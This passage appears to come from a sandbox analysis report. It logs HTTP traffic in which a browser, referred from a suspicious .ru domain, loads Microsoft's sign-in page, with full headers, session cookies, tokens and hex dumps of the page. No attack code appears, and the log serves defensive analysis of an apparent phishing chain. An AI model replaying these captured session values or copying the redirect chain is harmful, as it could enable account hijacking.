3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 Set-Cookie: OH.FLID=e8b5c6c8-3e04-4376-be1f-5786ea95dce7; expires=Fri, 06 Mar 2026 21:55:32 GMT; path=/; secure; samesite=none; httponly Set-Cookie: OH.SID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/ Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.6t49ULHB5pdwKJ7oHzI-cOfZI-bI-N703zDd0BLnXbCtvQre1iTwArGFh2YNeVfCTWC1UM2uMO_9cjoMq3CYin3raJSJwu-U0JRGbffDXLcNdhCzCaXtWQKKOPYqu-0KGo99LDMLPr787K1q_-dT02pogPUMsyNka7lH0IuK0988gOMXaqOwB-7QTHCGgP_tFl91ZRj_fjPqwaY6QDczKPZQYaRiceTlqU3zqBHEYAIYoPUNjj470t_vBPthutx4=N; expires=Thu, 06 Mar 2025 22:10:32 GMT; path=/; secure; samesite=none; httponly Set-Cookie: .AspNetCore.Correlation.b8bFv5RH47cxO4oW6ziY5KJu9qFV2UN0Bn0lPno6d_o=N; expires=Thu, 06 Mar 2025 22:10:32 GMT; path=/; secure; samesite=none; httponly Request-Context: appId= Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge,chrome=1 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: C71E856D87E84C838097D6F44E852976 Ref B: EWR311000107031 Ref C: 2025-03-06T21:55:32Z Date: Thu, 06 Mar 2025 21:55:32 GMT Connection: close Content-Length: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:35 UTC	1550	OUT	GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:35 UTC	2240	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 95360146-3ad2-4623-bf6a-cad68a7f6200 x-ms-ests-server: 2.1.20139.6 - WEULR1 ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-clitelem: 1,50168,0,, x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-fdBYRp7em5U_PFT12un9pg' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Set-Cookie: esctx-o5hmElAb9b8=AQABCQEAAABVrSpeuWamRam2jAF1XRQEAZ5w3bUrYbMIuMck-Ecql_diaEKAntEg63fe2ysZVdaOT9XYaKgZrECugfczZ46IgN2sWnFgPFSPp8nMZY0H9Lm6GdnfPGBZyOo7bH0iMV1eAB2RhDxS-1zNVCtDEksXsBVRXC9PrTIeFIZdhGEEkiAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=ArNZiE-suGVClIK0j8HrpL4; expires=Sat, 05-Apr-2025 21:55:35 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE65EC_TVbpIKKotniURumZtGt2BCSgBhbr6A67EvWCgruHp6KAfx-k024nRxdcgS_ZbvKdIj0AeE31JYQ-ILo_m2WQMl9LlvfJErVTxTy2wLvtGw_JvFQcDs-8mQz0-Oxhse-5dwing-5zYPffjnywUQnS7F_1ZlVZ8g9CB65OZIgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Thu, 06 Mar 2025 21:55:35 GMT Connection: close Content-Length: 21383
2025-03-06 21:55:35 UTC	14144	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head> <title>Redirecting</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" conten
2025-03-06 21:55:35 UTC	7239	IN	Data Raw: 29 29 7b 72 65 74 75 72 6e 20 63 2e 4f 6e 45 72 72 6f 72 28 65 2c 74 29 7d 76 61 72 20 6e 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 2c 6f 3d 69 28 29 2c 73 3d 61 28 29 3b 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 4c 6f 61 64 65 64 22 2c 65 29 3b 76 61 72 20 64 3d 6e 65 77 20 63 0a 3b 64 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 64 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 53 75 63 63 65 73 73 22 2c 64 2e 4c 6f 61 64 28 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6f 29 7b 74 68 72 6f 77 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 2e 20 52 65 73 6f 75 72 63 65 4c 6f 61 64 65 72 2e 4c 6f 61 64 28 29 20 66 61 69 6c 65 64 20 64 65 73 70 69 74 65 20 69 6e Data Ascii: )){return c.OnError(e,t)}var n=e.src\|\|e.href\|\|"",o=i(),s=a();r("[$Loader]: Loaded",e);var d=new c;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.Load(null,function(){if(o){throw"Unexpected state. ResourceLoader.Load() failed despite in

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:40 UTC	2946	OUT	GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: esctx-o5hmElAb9b8=AQABCQEAAABVrSpeuWamRam2jAF1XRQEAZ5w3bUrYbMIuMck-Ecql_diaEKAntEg63fe2ysZVdaOT9XYaKgZrECugfczZ46IgN2sWnFgPFSPp8nMZY0H9Lm6GdnfPGBZyOo7bH0iMV1eAB2RhDxS-1zNVCtDEksXsBVRXC9PrTIeFIZdhGEEkiAA; fpc=ArNZiE-suGVClIK0j8HrpL4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE65EC_TVbpIKKotniURumZtGt2BCSgBhbr6A67EvWCgruHp6KAfx-k024nRxdcgS_ZbvKdIj0AeE31JYQ-ILo_m2WQMl9LlvfJErVTxTy2wLvtGw_JvFQcDs-8mQz0-Oxhse-5dwing-5zYPffjnywUQnS7F_1ZlVZ8g9CB65OZIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-03-06 21:55:41 UTC	2859	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: DENY Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch Link: <https://aadcdn.msauth.net>; rel=preconnect; crossorigin,<https://aadcdn.msauth.net>; rel=dns-prefetch,<https://aadcdn.msftauth.net>; rel=dns-prefetch X-DNS-Prefetch-Control: on P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: d06ff2bb-8ce1-410b-8ec8-5b6a411d8c00 x-ms-ests-server: 2.1.20139.6 - WEULR1 ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-clitelem: 1,0,0,, x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-7qIh7EeCgUGaeKjSTBmv0A' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Set-Cookie: buid=1.AUsAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABLAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEJK9ZJqdhv9v_qmyvVAlsR1APNn6zj-1xI7rDNNDvZK11zGWQMz3xRpBkix8TbIA2FxowiFvY37jkeKmOVnhwWAVaic8AYW-YAdJF3stOftYgAA; expires=Sat, 05-Apr-2025 21:55:40 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEdbv8CXBhuQbLQf1VY8MqnNC-5UZYaZF1OlluX4YSlt5fpLPqlPZyTNOQ8sZICZKVEswwmXqutwe5Lasjy0N0_IfWDaTyI6ZUt7X6jcepT_6XgN4yGPRngY9BiMj6hoirDQRwvfaa4LEap0wDPHaRoIChDelQ7ZILRV3A-rIcz3kgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx-aKxRFnyWKM=AQABCQEAAABVrSpeuWamRam2jAF1XRQElBMnk3lhtaavH5x0_R3OCGibHy9JJybbIp0Jt0DaTjl8WS_mS0Xa0pNc3DD2sR-izExje7colbezsJt8Jc6czFKvPjV0eHjDJ9q_3QUJkyAOIA-9UgvzAtPOdpM1gussUpmZORLaqGtb65hxhwLSAyAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=ArNZiE-suGVClIK0j8HrpL68Ae7AAQAAANwQXN8OAAAA; expires=Sat, 05-Apr-2025 21:55:40 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Thu, 06 Mar 2025 21:55:40 GMT Connection: close Content-Length: 47226
2025-03-06 21:55:41 UTC	13525	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
2025-03-06 21:55:41 UTC	16384	IN	Data Raw: 30 4f 74 77 58 30 67 4b 53 2d 66 36 76 43 4f 6c 74 61 59 74 41 2d 6d 69 41 41 5c 75 30 30 32 36 6a 73 68 73 3d 30 22 2c 22 75 72 6c 47 65 74 43 72 65 64 65 6e 74 69 61 6c 54 79 70 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 47 65 74 43 72 65 64 65 6e 74 69 61 6c 54 79 70 65 3f 6d 6b 74 3d 65 6e 2d 55 53 22 2c 22 75 72 6c 47 65 74 52 65 63 6f 76 65 72 79 43 72 65 64 65 6e 74 69 61 6c 54 79 70 65 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 67 65 74 72 65 63 6f 76 65 72 79 63 72 65 64 65 6e 74 69 61 6c 74 79 70 65 3f 6d 6b 74 3d 65 6e 2d 55 53 22 2c 22 75 72 6c 47 65 74 4f 6e 65 54 Data Ascii: 0OtwX0gKS-f6vCOltaYtA-miAA\u0026jshs=0","urlGetCredentialType":"https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US","urlGetRecoveryCredentialType":"https://login.microsoftonline.com/common/getrecoverycredentialtype?mkt=en-US","urlGetOneT
2025-03-06 21:55:41 UTC	16384	IN	Data Raw: 6f 6e 74 65 6e 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f 77 61 74 73 6f 6e 73 75 70 70 6f 72 74 77 69 74 68 6a 71 75 65 72 79 2e 33 2e 35 2e 6d 69 6e 5f 64 63 39 34 30 6f 6f 6d 7a 61 75 34 72 73 75 38 71 65 73 6e 76 67 32 2e 6a 73 22 2c 22 66 62 75 6e 64 6c 65 22 3a 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f 66 72 61 6d 65 77 6f 72 6b 73 75 70 70 6f 72 74 2e 6d 69 6e 5f 6f 61 64 72 6e 63 31 33 6d 61 67 62 30 30 39 6b 34 64 32 30 6c 67 32 2e 6a 73 22 2c 22 72 65 73 65 74 45 72 72 6f 72 50 65 72 69 6f 64 22 3a 35 2c 22 6d 61 78 43 6f 72 73 45 72 72 6f 72 73 22 3a 2d 31 2c 22 6d 61 78 49 6e 6a 65 63 74 45 72 72 6f 72 73 22 3a 35 2c 22 6d 61 Data Ascii: ontent/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/frameworksupport.min_oadrnc13magb009k4d20lg2.js","resetErrorPeriod":5,"maxCorsErrors":-1,"maxInjectErrors":5,"ma
2025-03-06 21:55:41 UTC	933	IN	Data Raw: 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f 75 78 2e 63 6f 6e 76 65 72 67 65 64 2e 6c 6f 67 69 6e 2e 73 74 72 69 6e 67 73 2d 65 6e 2e 6d 69 6e 5f 35 38 6b 64 76 62 7a 63 74 64 6a 6b 34 38 79 65 74 61 65 6b 6e 67 32 2e 6a 73 22 20 6e 6f 6e 63 65 3d 27 37 71 49 68 37 45 65 43 67 55 47 61 65 4b 6a 53 54 42 6d 76 30 41 27 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 64 61 74 61 2d 62 69 6e 64 3d 22 64 65 66 69 6e 65 47 6c 6f 62 61 6c 73 3a 20 53 65 72 76 65 72 44 61 74 61 2c 20 62 6f 64 79 43 73 73 43 6c 61 73 73 22 20 63 6c 61 73 73 3d 22 63 62 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 Data Ascii: t/cdnbundles/ux.converged.login.strings-en.min_58kdvbzctdjk48yetaekng2.js" nonce='7qIh7EeCgUGaeKjSTBmv0A'></script></head><body data-bind="defineGlobals: ServerData, bodyCssClass" class="cb" style="display: none"> <script type="text/javas

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:40 UTC	1996	OUT	GET /favicon.ico HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638768949326945979.MGViZmE4OWItOTMyOC00ZTMxLWJjMTEtNDE4OTE3ZWNjYmYwYWJhNmI4OTUtYjM4Zi00ZTI1LTgxM2YtNzIyZDhhM2ZmNjk1&ui_locales=en-US&mkt=en-US&client-request-id=c78ca9f6-666c-4189-a6c8-50defdad580f&state=Rt8257lTmFhAL8-m-OCyBp-9HhiZIwQ_uaZ4DX79nrgtbKWNdr3UkmOm8jh5gVJko5153buwx_4McvBz3M1zriICy36Rzk1OqPwRco-6uhbAkOuEWIHF5Oh9FtB4MA3AmvfMMCPccmjUtTfMiyA-EDCUnL2nl1n2PLJxWXYOkVhf-kl6RI94t6rxZP-KKVKBhQi3kUrqU9IQ7aXpMHtZQa0E8yFxX0qlGVKTVVhJz5Yse_26TLBb8V1Aufv4Wo3JNarroRuYMtmtIj0zmX0S0jBksXmzGqujWjrOoTcam6f_bdG_zuBGvRJHPX2HvV82&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: esctx-o5hmElAb9b8=AQABCQEAAABVrSpeuWamRam2jAF1XRQEAZ5w3bUrYbMIuMck-Ecql_diaEKAntEg63fe2ysZVdaOT9XYaKgZrECugfczZ46IgN2sWnFgPFSPp8nMZY0H9Lm6GdnfPGBZyOo7bH0iMV1eAB2RhDxS-1zNVCtDEksXsBVRXC9PrTIeFIZdhGEEkiAA; fpc=ArNZiE-suGVClIK0j8HrpL4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE65EC_TVbpIKKotniURumZtGt2BCSgBhbr6A67EvWCgruHp6KAfx-k024nRxdcgS_ZbvKdIj0AeE31JYQ-ILo_m2WQMl9LlvfJErVTxTy2wLvtGw_JvFQcDs-8mQz0-Oxhse-5dwing-5zYPffjnywUQnS7F_1ZlVZ8g9CB65OZIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2025-03-06 21:55:40 UTC	1339	IN	HTTP/1.1 404 Not Found Cache-Control: private Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 81165d1c-2a19-40e0-81b5-1b4c4b4c5a00 x-ms-ests-server: 2.1.20203.5 - WEULR1 ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-R2yV7YythBGSQrLi7RDWiw' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Date: Thu, 06 Mar 2025 21:55:40 GMT Connection: close Content-Length: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:42 UTC	436	OUT	OPTIONS /api/report?catId=GW+estsfd+ams2 HTTP/1.1 Host: identity.nel.measure.office.net Connection: keep-alive Origin: https://login.microsoftonline.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:55:43 UTC	319	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 7 Date: Thu, 06 Mar 2025 21:55:43 GMT Connection: close Access-Control-Allow-Headers: content-type Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *
2025-03-06 21:55:43 UTC	7	IN	Data Raw: 4f 50 54 49 4f 4e 53 Data Ascii: OPTIONS

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:55:45 UTC	369	OUT	POST /api/report?catId=GW+estsfd+ams2 HTTP/1.1 Host: identity.nel.measure.office.net Connection: keep-alive Content-Length: 1282 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
